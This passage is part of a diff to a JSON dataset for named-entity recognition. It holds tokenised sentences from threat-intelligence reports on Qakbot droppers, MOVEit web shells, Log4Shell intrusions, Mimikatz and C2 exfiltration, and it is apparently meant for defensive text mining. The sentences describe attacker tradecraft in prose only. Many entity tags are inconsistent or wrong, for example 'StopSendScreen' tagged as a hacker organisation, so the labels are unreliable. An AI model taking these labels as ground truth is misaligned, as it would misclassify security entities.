"O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "customized", + "packet", + "size", + "using", + "a", + "XOR", + "value." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversary", + "exploited", + "a", + "web-facing", + "server", + "with", + "application" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "actor", + "established", + "initial", + "access", + "by", + "compromising", + "the", + "victim’s", + "web", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tools", + "were", + "transferred", + "to", + "a", + "compromised", + "web-facing", + "server" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversary", + "browsed", + "several", + "locations", + "to", + "search", + "for", + "the", + "data", + "they", + "were", + "after." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "Rotten/Bad", + "Potato", + "to", + "elevate", + "user", + "rights", + "by", + "abusing", + "API", + "calls", + "in", + "the", + "Operating", + "System." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "including", + "adding", + "of", + "registry", + "keys" + ], + "ner_tags": [ + "O", + "O", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "and", + "lateral", + "movement/execution", + "of", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "attackers", + "would", + "launch", + "a", + "lateral", + "movement", + "phase,", + "using", + "default", + "Windows", + "credentials" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "run", + "a", + "network", + "recognition", + "process", + "to", + "find", + "the", + "IP", + "address", + "of", + "each", + "of", + "the", + "ATMs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "B-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "a", + "variety", + "of", + "encryption", + "schemes", + "and", + "symmetric", + "keys." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "to", + "install", + "AnyDesk", + "and", + "provide", + "remote", + "access", + "for", + "the", + "“technician”", + "to", + "install", + "the", + "malware." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "All", + "captured", + "information", + "from", + "the", + "transaction", + "is", + "saved", + "to", + "an", + "encrypted", + "file", + "placed", + "in", + "a", + "directory", + "previously", + "set", + "by", + "the", + "malware", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Those", + "files", + "will", + "later", + "be", + "sent", + "to", + "the", + "malware", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Captured", + "data", + "stored", + "in", + "the", + "uploader", + "C2" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sending", + "all", + "cab", + "files", + "generated", + "from", + "the", + "stolen", + "transactions", + "to", + "the", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StartSendScreen,", + "StopSendScreen" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "StartSendScreen", + "Start", + "screen", + "capture", + "StopSendScreen", + "Stop", + "screen", + "capture" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Download", + "a", + "file", + "from", + "the", + "remote", + "server" + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "StartDownload,", + "StopDownload." + ], + "ner_tags": [ + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "Shell", + "Execute", + "a", + "specified", + "command", + "via", + "CMD" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "files", + "are", + "sent", + "through", + "an", + "HTTP", + "POST", + "request." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Add", + "the", + "process", + "to", + "a", + "startup", + "registry", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malicious", + "OneNote", + "documents", + "to", + "entice", + "users", + "to", + "click", + "on", + "an", + "embedded", + "file", + "to", + "download", + "and", + "execute" + ], + "ner_tags": [ + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "fake", + "message", + "to", + "lure", + "users", + "to", + "execute", + "the", + "HTA", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "Upon", + "clicking", + "the", + "Open", + "button,", + "it", + "drops", + "the", + "HTA", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "it", + "prompts", + "the", + "user", + "with", + "a", + "fake", + "message", + "to", + "double-click", + "on", + "open", + "to", + "view", + "the", + "attachment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "message", + "above", + "the", + "‘Open’", + "button", + "instructs", + "the", + "user", + "to", + "“double", + "click”", + "in", + "order", + "to", + "receive", + "the", + "attachment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "malicious", + "document", + "is", + "delivered", + "in", + "either", + "zip", + "files", + "or", + "ISO", + "images", + "to", + "the", + "target", + "through", + "phishing", + "emails." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "author", + "used", + "phishing", + "emails", + "to", + "deliver", + "malicious", + "OneNote", + "document", + "either", + "as", + "attachment" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "batch", + "script" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "a", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malicious", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Upon", + "execution", + "of", + "the", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "launched", + "by", + "cmd.exe" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "batch", + "file" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Embedded", + "Executable", + "Objects", + "In", + "OneNote" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "embedded", + "file", + "gets", + "executed", + "by", + "the", + "user" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "FileData", + "member", + "of", + "the", + "FileDataStoreObject", + "is", + "the", + "key", + "member", + "that", + "holds", + "the", + "embedded", + "data", + "in", + "the", + "OneNote", + "document." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Embedded", + "data", + "in", + "Data", + "object" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OneNote", + "file", + "contains", + "an", + "embedded", + "HTA", + "attachment" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "OneNote", + "file", + "with", + "the", + "embedded", + "HTA", + "file" + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "contains", + "the", + "“whoami”", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "make", + "use", + "of", + "the", + "curl", + "utility", + "to", + "download", + "Qakbot", + "and", + "then", + "execute", + "it." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "HTA", + "file", + "uses", + "curl", + "utility", + "to", + "download" + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Curl", + "is", + "used", + "to", + "download", + "the", + "malicious", + "DLL", + "file" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "script", + "will", + "then", + "execute", + "the", + "downloaded", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "the", + "payload", + "from", + "the", + "Internet", + "and", + "executes", + "on", + "the", + "target", + "system." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Powershell", + "will", + "be", + "invoked", + "and", + "it", + "fetch", + "the", + "Qakbot", + "payload", + "from", + "Internet" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "powershell", + "to", + "download", + "the", + "payload" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executed", + "by", + "rundll32.exe." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "script", + "will", + "then", + "execute", + "the", + "downloaded", + "file", + "with", + "Rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "execute", + "it", + "with", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Obfuscated", + "HTA", + "script" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "HTA", + "file", + "contains", + "obfuscated", + "script" + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "obfuscated", + "registry", + "is", + "then", + "read", + "by", + "MSHTA", + "and", + "the", + "obfuscated", + "code", + "is" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "with", + "obfuscated", + "content" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deobfuscated", + "HTA", + "content" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "code", + "is", + "de-obfuscated" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Base64", + "Decoded", + "instructions", + "in", + "dropper" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "base64", + "decoded", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "deletes", + "the", + "registry", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "registry", + "key", + "in", + "HKEY_CURRENT_USER\\SOFTWARE\\" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "A", + "closer", + "look", + "at", + "the", + "document", + "reveals", + "the", + "graphical", + "elements", + "are", + "all", + "images", + "placed", + "in", + "a", + "layered", + "style", + "by", + "the", + "malicious", + "actor." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "enumerate", + "files", + "and", + "folders" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "then", + "performs", + "SQL", + "queries", + "to", + "retrieve", + "files,", + "file", + "size,", + "folders" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Many", + "of", + "the", + "hosts", + "used", + "to", + "support", + "these", + "second-stage", + "operations", + "hosted", + "RDP", + "services" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "can", + "run", + "commands", + "that", + "will", + "download", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "web", + "shell", + "with", + "filenames", + "that", + "masquerade", + "as", + "human.aspx,", + "which", + "is", + "a", + "legitimate", + "component", + "of", + "the", + "MOVEit", + "Transfer", + "software." + ], + "ner_tags": [ + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "several", + "POST", + "requests" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "large", + "volumes", + "of", + "files", + "have", + "been", + "stolen", + "from", + "victims'", + "MOVEit", + "transfer", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "also", + "moved", + "laterally", + "to", + "the", + "domain", + "controller,", + "compromised", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "implanted", + "Ngrok", + "reverse", + "proxies" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "Ngrok", + "to", + "proxy", + "RDP", + "connections", + "and", + "to", + "perform", + "command", + "and", + "control." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "exploited", + "Log4Shell", + "[T1190]", + "for", + "initial", + "access", + "[TA0001]", + "to", + "the", + "organization’s", + "unpatched", + "VMware", + "Horizon", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "exploited", + "Log4Shell", + "for", + "initial", + "access", + "to", + "the", + "organization’s", + "VMware", + "Horizon", + "server." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "added", + "an", + "exclusion", + "rule", + "to", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "added", + "an", + "exclusion", + "rule", + "to", + "Windows", + "Defender." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "added", + "an", + "exclusion", + "rule", + "to", + "Windows", + "Defender." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "The", + "tool", + "allowlisted", + "the", + "entire", + "c:\\drive,", + "enabling", + "the", + "actors", + "to", + "bypass", + "virus", + "scans", + "for", + "tools" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "manually", + "disabled", + "Windows", + "Defender", + "via", + "the", + "GUI." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "exclusion", + "rule", + "allowlisted", + "the", + "entire", + "c:\\drive,", + "enabling", + "threat", + "actors", + "to", + "download", + "tools", + "to", + "the", + "c:\\drive", + "without", + "virus", + "scans." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "manually", + "disabled", + "Windows", + "Defender", + "via", + "the", + "Graphical", + "User", + "Interface", + "(GUI)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Scheduled", + "Task", + "was", + "named", + "RuntimeBrokerService.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "created", + "a", + "Scheduled", + "Task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors’", + "exploit", + "payload", + "created", + "Scheduled", + "Task" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "actors", + "used", + "RDP" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "RDP", + "sessions" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "the", + "actors", + "leveraged", + "RDP", + "to", + "propagate", + "to", + "several", + "hosts", + "within", + "the", + "network." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "RDP", + "to", + "move", + "laterally", + "to", + "multiple", + "hosts", + "on", + "the", + "network." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDP", + "connections" + ], + "ner_tags": [ + "B-Org", + "O" + ] + }, + { + "tokens": [ + "and", + "the", + "built-in", + "Windows", + "user", + "account", + "DefaultAccount", + "[T1078.001]", + "to", + "move", + "laterally" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "built-in", + "Windows", + "user", + "account", + "DefaultAccount." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "–", + "a", + "credential", + "theft", + "tool." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "then", + "executed", + "Mimikatz", + "on", + "VDI-KMS", + "to", + "harvest", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "was", + "observed", + "attempting", + "to", + "dump", + "the", + "Local", + "Security", + "Authority", + "Subsystem", + "Service", + "(LSASS)", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "trying", + "to", + "dump", + "LSASS", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "used", + "Mimikatz", + "to", + "harvest", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ngrok", + "–", + "a", + "reverse", + "proxy", + "tool", + "for", + "proxying", + "an", + "internal", + "service", + "out", + "onto", + "an", + "Ngrok", + "domain" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "were", + "able", + "to", + "proxy", + "[T1090]", + "RDP", + "sessions,", + "which", + "were", + "only", + "observable", + "on", + "the", + "local", + "network" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "downloaded", + "the", + "following", + "tools" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "next", + "stage", + "and", + "execute", + "it" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "exploit", + "payload", + "then", + "downloaded", + "mdeploy.text" + ], + "ner_tags": [ + "O", + "B-Exp", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "downloaded", + "malware", + "and", + "multiple", + "tools", + "to", + "the", + "network" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "as", + "outgoing", + "HTTPS", + "port", + "443", + "connections" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actors", + "removed", + "malicious", + "file", + "mde.ps1", + "from", + "the", + "dis." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "removed", + "mde.ps1", + "from", + "the", + "disk" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "$BASE64", + "encoded", + "payload" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "recording", + "files", + "to", + "be", + "uploaded", + "when", + "their", + "download", + "is", + "requested", + "by", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "uploads", + "it", + "back", + "to", + "the", + "server." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uploads", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Upload", + "a", + "recording", + "file", + "with", + "a", + "specified", + "name", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "data", + "to", + "be", + "exfiltrated", + "to", + "the", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "data", + "to", + "the", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sends", + "the", + "shellcode", + "execution", + "results", + "to", + "the", + "C2", + "server" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "next", + "loader", + "stage" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "it" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Decrypts" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decryption", + "procedure" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Decrypts" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "shellcode", + "decrypts" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "decrypting" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "Orchestrator" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decodes", + "the", + "directory", + "path" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "hidden", + "page" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "them", + "on", + "the", + "fly." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "it", + "with", + "XOR" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decrypts", + "the", + "Trojan", + "with", + "a", + "XOR-based", + "cipher" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "decryption", + "key" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "the", + "Trojan", + "loader", + "into", + "exe." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "be", + "injected", + "to", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "injects", + "the", + "ProcessWorm", + "into", + "all", + "processes", + "running", + "on", + "the", + "system" + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-Features", + "I-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "itself", + "into", + "processes" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "the", + "ProcessWorm", + "if", + "needed." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "the", + "ProcessWorm", + "into", + "processes" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "injected", + "into", + "all", + "running", + "processes." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injecting", + "code" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "injected", + "Trojan", + "loader" + ], + "ner_tags": [ + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "collects", + "specific", + "system", + "information" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "Returns", + "information", + "about", + "the", + "machine’s", + "BIOS." + ], + 